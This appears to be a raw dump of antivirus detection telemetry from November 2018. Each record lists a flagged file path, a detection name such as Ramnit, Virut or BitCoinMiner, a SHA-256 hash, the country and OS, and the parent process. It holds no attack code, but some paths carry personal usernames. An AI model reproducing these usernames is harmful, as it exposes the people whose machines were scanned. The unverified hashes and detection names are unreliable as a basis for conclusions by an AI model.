  Row(detection=Row(filename='service.exe', filepath='C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='5931493c4c1b03b23fbf74fceab77280aac7a0a483e0fb86c9db29216ba97f1e', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T01:37:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='castsrv.exe', filepath='C:\\Windows\\SoftwareDistribution\\Download\\40e0103692e1ebbb162ed295f786b047\\x86_Microsoft-Windows-Client-Features-Package~~X86~~10.0.17134.1\\x86_microsoft-windows-castserver_31bf3856ad364e35_10.0.17134.1_none_510114d1e1d1b62a\\castsrv.exe', filesize=60000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='77a7de2f5473a3d62582bcc5bae9c97a861511f671f6c7b84f365b56f36f29c7', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:32:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a00015.html', filepath='\\\\?\\C:\\Symantec Endpoint Protection Manager v12.1.5 completo\\Tools\\Integration\\SEPM_WebService_SDK\\ReferenceGuide\\a00015.html', filesize=240000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='35130d14646fc134a1652de5bc5d6c9e87f33944ed0d3830eee3117d800c5ac4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:21:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp2649704\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/prod:b \\\\\\/aflt=mnn_svcpyxoji_18_44_ssg02 \\\\\\/instlref=s4  \\\\\\/noadmin \\\\\\/nochrome \\\\\\/adt=tE1L1R1V2Y1L1QzuzztD0E0EyBtAyBzy0C0E0CzyyB0BtDtCtTtE1L1R1V1B1Q2ZzutBtDtCzztCtCtDtAtBtAtBzztAyEyDtCzytTtE1Q1G1Izu2Y1G1J1G1F2W1GtTtE1Q1G1I1M2YzuyD \\\\\\/ext:pilp \\\\\\/inst_loc=442,762,646,504 \\\\\\/RSF=4344', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\tmp2649704\\MNNStubSetup.exe', parentsize=576000, timestamp='2018-11-04T02:37:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='lmgrd.exe', filepath='e:\\samsung yedek\\d dosyaaa\\3ctoplu\\masaustutoplu\\autocad2007\\bin\\acadfeui\\support\\nlm\\program files\\autodesk network license manager\\lmgrd.exe', filesize=1024000, name='W32/Ramnit.CD.#M1.#R1'), hash='765d772c0a32d3a7eda5a61134ef63f5f13a9cf4de631a579d75011b159a8145', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T21:24:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-121441-4081a5ae', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a3bd5a77\\AVSCAN-20181104-121426-3E134BBC\\AVSCAN-20181104-121441-4081A5AE', filesize=284000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='43071bb620d77d819b1ee36636e4d8094a6092e32132bd3d2c7a576c97bcd848', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:14:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\tmp4301983\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:06:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autorun.exe', filepath='e:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-04T14:14:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='service_kms.vir', filepath='C:\\Program Files\\KMSpico\\Service_KMS.VIR', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline='--engine=2 --session-id=WzsJimFyRuiBDuuZeegJN5nPkZnpUX81m2YPgA+t --registry-suffix=ESET --srt-field-trial-group-name=NewCleanerUIExperiment', country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\35.178.200\\software_reporter_tool.exe', parentsize=12095608, timestamp='2018-11-04T21:11:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T10:13:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-141136-08746a28', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6125d533\\AVSCAN-20181104-135312-59F9F13F\\AVSCAN-20181104-141136-08746A28', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='5c45b0e717ec785818796cccd5ef52705bb98997101d8a414549f1e98a907441', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:41:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='packard.exe', filepath='G:\\packard\\packard.exe', filesize=512000, name='TR/Chydo.TF.#M1.#R1'), hash='ba6c820d9281c89bd6fb700d5485676e7e4a5450ff7f1d66ca8d237933515100', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-04T09:57:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup.exe', filepath='F:\\FOTO_FOTO\\2003\\Foto_dll\\setup.exe', filesize=640000, name='W32/Ramnit.C.#M1.#R1'), hash='6456ef46bc46d4476ff0889915def842ffec36d62ab7d42b60ca35637ca9280b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-04T20:23:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='9c8d0a43aa95e439cede9b69cacfb3c606381bfd6745111c5cfe73a38af9ae38', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-04T18:57:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T22:08:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='project rubby 2.983.exe', filepath='C:\\Users\\X\\Music\\Project RuBBy 2.983.exe', filesize=320000, name='HEUR/AGEN.1015984.#M1.#R1'), hash='59c825e3e530f177f11965667c14361d385dfd53ae02730bd73b1c63e29bde59', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T14:34:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='nouveau dossier.exe', filepath='D:\\Nouveau dossier.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='5f9c58fa91578780ab3658e472f25933a098ca5641aea2e383cba2d91d3c30d7', metadata=Row(cmdline='rtp', country='BF', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-04T23:16:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-120935-163930b4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8748c67e\\AVSCAN-20181104-120656-00F74416\\AVSCAN-20181104-120935-163930B4', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:09:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T21:56:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dxa7155.tmp', filepath='\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\dxa7154.tmp\\dxa7155.tmp', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='GB', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:54:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='黑沙特工m(台版普通版)2018-10-16_135746.apk', filepath='\\\\?\\C:\\Users\\X\\Downloads\\黑沙特工M(台版普通版)2018-10-16_135746.apk', filesize=11792000, name='Adware/ANDR.CyFin.B.Gen.#M1.#R1'), hash='171d70b16abbbb05cd6cfaff382fe316cde982a2a938ad079464404cf382f449', metadata=Row(cmdline=None, country='HK', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T07:57:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='bf770e11dae387e600db125ed0cbdb935fe00223066b586dce323f746c5182f5', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\BF770E11DAE387E600DB125ED0CBDB935FE00223066B586DCE323F746C5182F5', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='bf770e11dae387e600db125ed0cbdb935fe00223066b586dce323f746c5182f5', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T16:11:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T22:49:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='synhel~1.exe', filepath='C:\\Users\\eZee\\AppData\\Roaming\\6B53D1~1\\SYNHEL~1.EXE', filesize=576000, name='HEUR/AGEN.1000187.#M1.#R1'), hash='a6ba2bfa2b6a1c219b3496827d3f19c296fa6d236ee6f15e9a9b438b1f751dc5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T06:16:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T07:45:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T19:15:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-202223-c05d0c5c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-201807-925018B6\\AVSCAN-20181104-202223-C05D0C5C', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:22:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T22:08:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='f_0011cc', filepath='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_0011cc', filesize=280000, name='PUA/CryptoMiner.Gen.#M1.#R1'), hash='57db57b70209fd9e5ab85e37d76c546658a428b264b8062f4186e517aa95cbf2', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\Application\\chrome.exe', parentsize=1426264, timestamp='2018-11-04T20:42:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T02:10:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flash_tool.exe', filepath='D:\\china\\SP_Flash_Tool_v5.1504_Win\\SP_Flash_Tool_5.1504\\flash_tool.exe', filesize=8320000, name='W32/Sality.AT.#M1.#R1'), hash='a350b5d9620c5530ba3d3ba3dfde1d09f4e993539d3530acfddd551e7fb72eb9', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T20:30:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181102-173106-39800afa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_dbdd67d5\\AVSCAN-20181102-173035-34383BC4\\AVSCAN-20181102-173106-39800AFA', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:31:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='smuninstall.exe', filepath='\\\\?\\C:\\AdwCleaner\\Quarantine\\files\\fpkdeshirgxikjcxdpteiqwokghhiscx\\GNUpdate\\SMUninstall.exe', filesize=384000, name='PUA/SearchModule.Gen.#M300.#R7600'), hash='9fcfd14a07cc0801d324c4022767ba1ed9638d864d4380d4dd375b44f41d78cf', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:33:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-081234-268cff3e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_78554da8\\AVSCAN-20181102-081049-1917AE4E\\AVSCAN-20181102-081234-268CFF3E', filesize=64000, name='TR/Agent.64000.119.#M1.#R1'), hash='892d3d7968ba29bd8e521710a5d9a62748c78fd4436a11cbc94c1ec4fb096f02', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:12:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered tocol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered tocol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='c2c74d5724abbb8c4ce1b9b54093850b48820c8d39869f0434e8240d24009071', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:33:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ckveunpf.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\ckvEUNPf.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:34:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vbe6.dll', filepath='D:\\AutoCAD2009\\x86\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.A.#M1.#R1'), hash='f63062e6ae4503f8bc696fd0b759d0763f5f032bf5335dbd265c92907a0459a4', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:48:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00658b6a', filepath='C:\\Windows\\Temp\\96471c11-35d4-4dc9-ad1d-2aa0b87bc74b\\tmp000002e4\\tmp00658b6a', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='8468c3203db279591d6f3ca70d715214b3a8402c2e75c2b8753a53e0fdbd65a0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-02T15:45:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Users\\X\\Downloads\\setup.exe', filesize=448000, name='HEUR/AGEN.1029157.#M1.#R1'), hash='b4b2347e4416075fa0dd4ce8155ff2e67bc3a061b9ec6904da41423cc07d5b7b', metadata=Row(cmdline=None, country='LT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T11:29:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sdnbqwjzvle.exe', filepath='c:\\users\\X\\appdata\\roaming\\sdnbqwjzvle.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T16:52:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mip.exe', filepath='C:\\Program Files\\Common Files\\microsoft shared\\ink\\mip.exe', filesize=1216000, name='TR/Symmi.pkcx.#M1.#R1'), hash='ec4416e372ce066183128fc8b21328bbb598f93cc94a8ba6d86e2c0283939757', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:04:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='imenubar.dll', filepath='C:\\Microgaming\\Poker\\BetssonMPP\\control\\imenubar.dll', filesize=96000, name='GAME/Casino.Gen.#M1.#R1'), hash='9c70d52c17032f3c08a6e64a275519c7b90ed07895fad1a80b47ec5ff57ca95f', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Microgaming\\Poker\\BetssonMPP\\mppoker.exe', parentsize=1289976, timestamp='2018-11-02T09:56:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mpc-hc.exe', filepath='\\\\?\\C:\\Program Files\\K-Lite Codec Pack\\Media Player Classic\\mpc-hc.exe', filesize=5888000, name='W32/Virut.Gen.#M1.#R1'), hash='d011795738a04dcb386c1d814816cc5ef4e59e62ca33bb19248969920bb83bd2', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:55:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vupvzzf.exe', filepath='c:\\users\\X\\appdata\\roaming\\vupvzzf.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T17:51:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-183242-ad79ebbf', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-183143-A0D85B97\\AVSCAN-20181102-183242-AD79EBBF', filesize=3200000, name='HEUR/AGEN.1027017.#M1.#R1'), hash='ddf358abc237458efcff4f27d79f790fc905dbc4e1258eb43d0d80a51be54bee', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:33:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8fe8e6c2e3049b61a5dcec440d458b7a20bf0fad78258ec6aca728f3735ec365', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\8FE8E6C2E3049B61A5DCEC440D458B7A20BF0FAD78258EC6ACA728F3735EC365', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='8fe8e6c2e3049b61a5dcec440d458b7a20bf0fad78258ec6aca728f3735ec365', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:19:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='digitalrescue4premium.exe', filepath='H:\\HBCD\\Programs\\DIGITALRESCUE4PREMIUM.EXE', filesize=64000, name='BDS/Rogue.766077.#M1.#R1'), hash='be37e8db54be4ab3f6336804357cd17c9b97e65cdb98cb4242bf352aa9ca0f8d', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T22:11:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vshub.exe', filepath='\\\\?\\C:\\ProgramData\\vshub.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='abbf959ac30d23cf2882ec223966b0b8c30ae85415ccfc41a5924b29cd6bd4db', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:13:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='crossfire pack#2.exe', filepath='\\\\?\\C:\\Users\\X\\Desktop\\Hotkey\\Macro Pack#2\\Crossfire Pack#2.exe', filesize=1024000, name='HEUR/APC.#M1.#R1'), hash='dab9d19236846daa08dfce5e5487e83374f5ffaf7c7f010a892d384274935f98', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:55:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\k4cqshnjf4v\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1541111679.5bdb7f7f263fa', country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Free\\104436716.exe', parentsize=671232, timestamp='2018-11-02T02:20:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-074945-b0f5104e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_14358ac3\\AVSCAN-20181031-234137-7F763213\\AVSCAN-20181102-074945-B0F5104E', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='service.exe', filepath='C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:49Z'), dt=datetime.date(2018, 11, 2)),
